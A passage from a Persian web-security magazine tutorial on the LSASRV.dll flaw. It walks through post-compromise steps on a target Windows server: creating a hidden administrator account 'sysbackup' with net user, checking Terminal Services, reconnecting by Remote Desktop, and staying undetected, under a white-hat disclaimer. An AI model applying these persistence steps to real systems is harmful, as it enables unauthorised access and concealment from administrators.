ﮐﻨﻴﺪ ﺑﺎﺯ ﻫﻢ ﺗﮑﺮﺍﺭ ﻣﻲ ﮐﻨﻢ ﺩﺭ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﺍﺯ ﻧﻔﻮﺫ ﻫﻤﻪ ﭼﻴﺰ ﺑﻪ ﺧﻮﺩ ﺷﻤﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ ﻭﺍﻳﻦ ﺷﻤﺎ
ﻫﺴﺘﻴﺪ ﮐﻪ ﻧﻮﻉ ﻧﻔﻮﺫ ﺧﻮﺩﺗﺎﻥ ﺭﺍ ﺭﻭﻱ ﻫﺪﻑ ﮔﺴﺘﺮﺵ ﻣﻲ ﺩﻫﻴﺪ .ﺩﺭ ﺷﮑﻞ ﺯﻳﺮ ﺑﺎ ﺩﺳﺘﻮﺭ net user
ﺍﮐﺎﻧﺖ ﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻣﺸﺎﻫﺪﻩ ﮐﻨﻴﺪ ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﭘﺴﻮﻭﺭﺩ ﻳﮑﻲ ﺍﺯ ﻫﻤﻴﻦ ﺍﮐﺎﻧﺖ ﻫﺎ
ﺭﺍ ﺗﻐﻴﻴﺮ ﺑﺪﻫﻴﺪ ﻭﻟﻲ ﭘﺴﻮﻭﺭﺩ ﻛﺎﺭﺑﺮ ﺍﺻﻠﻲ ﮐﻪ ﺩﺭ ﺍﻳﻨﺠﺎ Administratorﻫﺴﺖ ﺭﺍ ﺗﻐﻴﻴﺮ ﻧﻤﻲ
ﺩﻫﻢ .ﺍﮔﺮ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺩﺍﺷﺘﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﻣﺪﺕ ﺯﻳﺎﺩﻱ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﺸﺪﻩ ﺑﻮﺩ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮﺍﺕ
ﻣﻨﺎﺳﺐ ﺍﺳﺖ.
15 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﻭﻟﻲ ﻣﻦ ﻗﺼﺪ ﺩﺍﺭﻡ ﻳﮏ ﻳﻮﺯﺭ ﺑﺎ ﺩﺳﺘﺮﺳﻲ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﺍﻳﺠﺎﺩ ﮐﻨﻢ ﺑﺎ ﻧﺎﻡ ) sysbackupﺑﻪ ﺷﮑﻞ
ﺯﻳﺮ ﺗﻮﺟﻪ ﮐﻨﻴﺪ ( ﺑﺎﺯ ﻫﻢ ﺗﻮﺟﻪ ﮐﻨﻴﺪ ﺍﮔﺮ ﻳﻮﺯﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺖ ﮐﻪ ﺑﺮﺍﻱ ﻣﺪﺗﻲ ﺍﺯ ﺁﻥ ﺁﺳﺘﻔﺎﺩﻩ ﻧﻤﻲ
ﺷﺪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺮ ﺭﻭﻱ ﻫﻤﺎﻥ ﮐﺎﺭ ﮐﻨﻴﺪ .
ﺑﺎ ﺍﺟﺮﺍﻱ ﻣﺠﺪﺩ ﻓﺮﻣﺎﻥ net userﻣﻴﺒﻴﻨﻴﺪ ﮐﻪ sysbackupﺑﻪ ﻛﺎﺭﺑﺮ ﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺍﺿﺎﻓﻪ ﺷﺪ
16 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﻩ ﺟﺰﻳﻴﺎﺕ ﺩﺭﺑﺎﺭﻩ ﻳﻮﺯﺭﻱ ﮐﻪ ﺳﺎﺧﺘﻴﻢ ﺍﺯ ﻓﺮﻣﺎﻥ net user sysbackupﺍﺳﺘﻔﺎﺩﻩ
ﻣﻲ ﮐﻨﻴﻢ ﺑﻪ ﻗﺴﻤﺖ local Group membershipsﺗﻮﺟﻪ ﮐﻨﻴﺪ ﻣﺘﻮﺟﻪ ﻣﻲ ﺷﻮﻳﺪ ﻫﻨﻮﺯ ﺍﻳﻦ
ﻛﺎﺭﺑﺮ ﻳﮏ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﻧﻴﺴﺖ!
ﻣﻦ ﺑﺎ ﺩﺳﺘﻮﺭ ﻱ ﮐﻪ ﺩﺭ ﺷﮑﻞ ﺯﻳﺮ ﻣﻴﺒﻴﻨﻴﺪ Sysbackupﺭﺍ ﺑﻪ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﺗﻐﻴﻴﺮ ﻣﻲ ﺩﻫﻢ
17 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﻳﮏ ﭘﺴﻮﻭﺭﺩ ﻫﻢ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻫﺮ ﮔﻮﻧﻪ ﺳﻮ ﺍﺳﻨﻔﺎﺩﻩ ﺍﻱ ﺭﻭﻱ ﺍﻳﻦ ﻳﻮﺯﺭ ﺗﻌﺮﻳﻒ ﻣﻴﮑﻨﻢ
۱۲۳۴۵
ﺑﺎ ﺩﺳﺘﻮﺭ net startﺳﺮﻭﻳﺲ ﻫﺎﻳﻲ ﮐﻪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺩﺭ ﺣﺎﻝ ﺍﺟﺮﺍ ﻫﺴﺖ ﺭﺍ ﺑﺒﻴﻨﻴﺪ ﺍﮔﺮ
Remote Terminal Servicesﺭﺍ ﻣﺸﺎﻫﺪﻩ ﮐﺮﺩﻳﺪ ﺑﻌﺪﺍ ﻣﻴﺘﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻭﻳﺲ
18 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
Desktop Connectionﻳﺎ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻣﺜﻞ Terminal Server & Clientﺍﺳﺘﻔﺎﺩﻩ
ﮐﻨﻴﺪ ﺑﺮﻧﺎﻣﻪ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺍﺯ ﺳﺎﻳﺖ Download.comﺑﮕﻴﺮﻳﺪ
)ﻣﺸﺎﻫﺪﻩ ﻟﻴﺴﺖ ﺳﺮﻭﻳﺲ ﻫﺎﻱ ﺟﺎﺭﻱ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻫﺪﻑ -ﺑﻪ ﺧﺼﻮﺹ (Terminal Services
ﺍﮔﺮ ﺳﺮﻭﻳﺲ Terminal Serviceﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺩﺭ ﺣﺎﻟﺖ startﻧﺒﻮﺩ ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻋﻨﻮﺍﻥ
ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺭﺍ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻱ ﮐﻨﻴﺪ ﺗﺎ ﺩﺭ ﺩﻓﻌﺎﺕ ﺑﻌﺪﻱ ﺍﻳﻦ ﺍﻣﮑﺎﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﻭﺟﻮﺩ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﮐﻪ ﺍﺯ ﻃﺮﻳﻖ remote Desktop Connectionﺑﻪ ﺳﺮﻭﺭ ﻣﻮﺭﺩ ﻧﻈﺮ ﻭﺻﻞ ﺷﻮﻳﺪ
).ﺑﺮﺍﻱ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻱ ﺳﺮﻭﻳﺲ ﻫﺎ ﺑﻪ ﺯﻳﺮ ﺩﺳﺘﻮﺭﺍﺕ ﻓﺮﻣﺎﻥ Netﻣﺮﺍﺟﻌﻪ ﮐﻨﻴﺪ ( ﺍﻟﺒﺘﻪ ﺍﺯ ﺑﺮﻧﺎﻣﻪ
19 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻣﺜﻞ Terminal Server&Clientﻭ WinVnc32ﻧﻴﺰ ﺑﺮﺍﻱ ﻭﺻﻞ ﺷﺪﻥ ﺑﻪ ﺳﺮﻭﺭ
ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻴﺪ ﮐﻪ ﺩﺭ ﺍﻳﻨﺠﺎ ﻣﻦ ﺑﺮﺍﻱ ﺭﺍﺣﺘﻲ ﮐﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺧﻮﺩ ﻳﮑﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺩﺍﺧﻠﻲ
Windowsﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﮐﻨﻢ .
ﺩﺭ ﺷﮑﻞ ﺯﻳﺮ ﺍﺯ User nameﻭ Passwordﺍﻱ ﮐﻪ ﺩﺭ ﻣﺮﺍﺣﻞ ﺑﺎﻻ ﺑﺎ ﻧﺤﻮﻩ ﻱ ﺍﻳﺠﺎﺩﺷﺎﻥ ﺁﺷﻨﺎ
ﺷﺪﻳﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﮐﻨﻴﻢ .ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﺗﻨﻬﺎ ﺭﺍﻩ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﻣﺠﺪﺩ ﺑﻪ ﻳﮏ ﺳﻴﺴﺘﻢ ﻫﮏ ﺷﺪﻩ ﻧﻴﺴﺖ ﺑﻠﮑﻪ
ﺍﺯ ﺁﻧﺠﺎﻳﻲ ﮐﻪ ﺍﻳﻦ ﺭﻭﺵ User Friendlyﻫﺴﺖ ﻣﻦ ﺁﻥ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺜﺎﻝ ﺯﺩﻡ ﻫﻤﺎﻧﻄﻮﺭﻱ ﮐﻪ ﺩﺭ
ﺑﺎﻻ ﻫﻢ ﮔﻔﺘﻢ ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﻳﺠﺎﺩ ﻳﮏ BackDoorﻫﻢ ﺩﺭ ﺳﻴﺴﺘﻢ ﺩﻭﺑﺎﺭﻩ ﺑﻪ ﻫﻤﻮﻥ ﺳﻴﺴﺘﻢ
ﺑﺪﻭﻥ ﻧﻴﺎﺯ ﺑﻪ ﺍﺟﺮﺍﻱ Exploitﻧﻔﻮﺫ ﮐﻨﻴﺪ.
ﻭﺍﻳﻦ ﻫﻤﺎﻥ ﭼﻴﺰﻱ ﺍﺳﺖ ﮐﻪ ﺷﻤﺎ ﺍﻧﺘﻈﺎﺭ ﺑﻪ ﺩﺳﺖ ﺁﻭﺭﺩﻧﺶ ﺭﺍ ﺩﺍﺷﺘﻴﺪ ﻭ ﻣﻦ ﻣﻄﻤﺌﻦ ﻫﺴﺘﻢ ﮐﻪ ﺷﻤﺎ
ﺩﺳﺖ ﺑﻪ ﻫﻴﭽﮕﻮﻧﻪ ﺧﺮﺍﺑﮑﺎﺭﻱ ﻧﻤﻴﺰﻧﻴﺪ ﻭ ﻣﺎﻧﻨﺪ ﻫﻤﻪ ﻫﮑﺮﻫﺎﻱ ﮐﻼﻩ ﺳﻔﻴﺪ ﺩﺭ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻣﺪﻳﺮ ﺁﻥ
20 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﺳﺎﻳﺖ ﺭﺍ ﺍﺯ ﺩﺍﺷﺘﻦ ﺍﻳﻦ Bugﺑﻪ ﺧﺼﻮﺹ ﺑﺎﺧﺒﺮ ﻣﻲ ﮐﻨﻴﺪ ﻭ ﺭﺍﻩ ﭘﭻ ﮐﺮﺩﻥ ﺍﻳﻦ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺭﺍ
ﻫﻢ ﺑﻪ ﺁﻧﻬﺎ ﻧﺸﺎﻥ ﻣﻲ ﺩﻫﻴﺪ
ﻧﮑﺘﻪ ﻣﻬﻢ:
ﺍﻳﻦ ﺍﻣﮑﺎﻥ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﮐﻪ ﺣﺘﻲ ﺑﺎ ﺩﺍﺷﺘﻦ Userﻭ Passwordﻧﻴﺰ ﻧﺘﻮﺍﻧﻴﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺪﻑ
ﻭﺻﻞ ﺷﻮﻳﺪ ﺯﻳﺮﺍ ﺑﺎﻳﺪ ﺳﺮﻭﺭ ﻣﻮﺭﺩ ﻧﻈﺮ Restartﺷﻮﺩ ﺗﺎ ﺍﮐﺎﻧﺖ ﺗﺎﺯﻩ ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺷﻤﺎ ﺩﺭ
ﭘﺮﻭﺳﻪ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻢ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺗﺎ ﺩﺭ ﺩﻓﻌﻪ ﺑﻌﺪﻱ ﺑﺘﻮﺍﻥ ﺍﺯ ﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ .ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ
ﻧﻴﺰ ﺍﺯ Remote Shutdown Dialog Windowsﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻴﺪ ﺳﭙﺲ ﺩﻭﺑﺎﺭﻩ ﺍﺯ Remote
Desktop connectionﺑﺮﺍﻱ ﻭﺻﻞ ﺷﺪﻥ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻴﺪ .
21 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
Restartﻧﻤﺎﻳﻴﺪ .ﺍﻟﺒﺘﻪ ﺷﻤﺎ ﺑﺎﻳﺪ ﺭﻳﺴﮏ ﺧﻄﺮ ﻟﻮ ﺭﻓﺘﻦ ﻧﻔﻮﺫ ﺧﻮﺩ ﺭﺍ ﺑﭙﺬﻳﺮﻳﺪ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺍﮔﺮ ﺩﺭ
ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻧﻴﺰ ﺑﻌﺪ ﺍﺯ Restartﮐﺮﺩﻥ ﺳﻴﺴﺘﻢ ﻫﺪﻑ ﺑﺎﺯ ﻧﺘﻮﺍﻧﺴﻴﺪ ﺑﻪ ﺁﻥ Log inﻧﻤﺎﻳﻴﺪ ﺍﻳﻦ
ﺍﺣﺘﻤﺎﻝ ﻣﻲ ﺭﻭﺩ ﮐﻪ ﺣﻤﻠﻪ ﺷﻤﺎ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪﻩ ﺍﺳﺖ ﻭ ﺍﮐﺎﻧﺖ ﺟﺪﻳﺪ ﺷﻤﺎ Disableﻭ ﻳﺎ ﺣﺬﻑ ﺷﺪﻩ
ﺍﺳﺖ ....ﺩﻭﺑﺎﺭﻩ ﺳﻌﻲ ﮐﻨﻴﺪ ﺍﺯ ﻃﺮﻳﻖ ﻫﻤﻴﻦ Exploitﻭﺍﺭﺩ ﺷﻮﻳﺪ ﻭﻟﻲ ﺍﻳﻦ ﺑﺎﺭ ﺑﺎ ﺍﺣﺘﻴﺎﻁ ﺑﻴﺸﺘﺮ
ﮔﺮﭼﻪ ﻧﻔﻮﺫ ﺑﻪ ﻳﮏ ﺳﻴﺴﺘﻢ ﮐﺎﺭ ﺁﺳﺎﻧﻲ ﻧﻤﻲ ﺗﻮﺍﻧﺪ ﺑﺎﺷﺪ ﻭﻟﻲ ﺁﺯ ﺍﻥ ﻧﻴﺰ ﭘﻴﭽﻴﺪﻩ ﺗﺮ ﮔﺴﺘﺮﺵ ﻧﻔﻮﺫ
ﻭ ﻧﻴﺰ ﭘﻨﻬﺎﻥ ﻣﺎﻧﺪﻥ ﺍﺳﺖ ﻫﻨﺮ ﺍﺻﻠﻲ ﻫﮏ ﺩﺭ ﻫﻤﻴﻦ ﻧﮑﺘﻪ ﻣﺘﺒﻠﻮﺭ ﻣﻲ ﺷﻮﺩ.....
ﮐﻼﻡ ﺁﺧﺮ :ﻣﻬﻢ ﺍﻳﻦ ﻧﻴﺴﺖ ﮐﻪ ﭼﻄﻮﺭ ﺑﻪ ﻫﺪﻑ ﺧﻮﺩ ﻧﻔﻮﺫ ﻣﻲ ﮐﻨﻴﺪ ﺑﻠﮑﻪ ﻣﻬﻢ ﺍﻳﻦ ﺍﺳﺖ ﮐﻪ ﻧﻔﻮﺫ
ﺧﻮﺩ ﺭﺍ ﭼﮕﻮﻧﻪ ﮔﺴﺘﺮﺵ ﻣﻲ ﺩﻫﻴﺪ ﻭ ﺍﺯ ﻧﻔﻮﺫ ﺧﻮﺩ ﭼﻪ ﺍﻫﺪﺍﻓﻲ ﺭﺍ ﺩﻧﺒﺎﻝ ﻣﻲ ﮐﻨﻴﺪ .ﺧﻮﺍﻫﺸﻤﻨﺪﻳﻢ ﺍﺯ
ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﺑﺮﺍﻱ ﺍﻣﻦ ﮐﺮﺩﻥ ﺳﺮﻭﺭﻫﺎﻱ ﺧﻮﺩ ﺑﻬﺮﻩ ﺑﮕﻴﺮﻳﺪ ﻭﺑﻪ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﮔﻮﺷﺰﺩ ﮐﻨﻴﺪ ﻭ ﺍﮔﺮ ﺑﻪ
22 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﭼﻨﻴﻦ ﺑﺎﮔﻲ ﺩﺭ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﭘﻲ ﺑﺮﺩﻳﺪ ﺑﻪ ﻧﺼﺐ ﭘﭻ ﻫﺎﻱ ﺍﺷﺎﺭﻩ ﺷﺪﻩ ﺍﻗﺪﺍﻡ ﻧﻤﺎﻳﻴﺪ .ﺩﺭ ﺯﻳﺮ
Sourceﺍﻳﻦ Exploitﺭﺍ ﺑﺮﺍﻱ ﮐﺎﺭﺑﺮﺍﻧﻲ ﮐﻪ ﻣﺴﻠﻂ ﺑﻪ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ ﺑﻪ ﺯﺑﺎﻥ Cﻫﺴﺘﺪ ﺭﺍ
ﻗﺮﺍﺭ ﻣﻲ ﺩﻫﻴﻢ
ﺩﺭ ﺻﻮﺭﺕ ﻫﺮ ﮔﻮﻧﻪ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﻣﺸﮑﻞ ﻟﻄﻔﺎ ﺑﺎ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﻓﺮﻣﺎﻳﻴﺪ
ﺿﻤﻨﺎ ﺑﻪ ﺗﻤﺎﻣﻲ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺩﺭ ﺍﺳﺮﻉ ﻭﻗﺖ ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﻣﻲ ﺷﻮﺩ .
Mohsen2_ir@yahoo.com
Liv4devil@yahoo.com C0llect0r@Spymac.com
23 www.WebSecurityMgz.com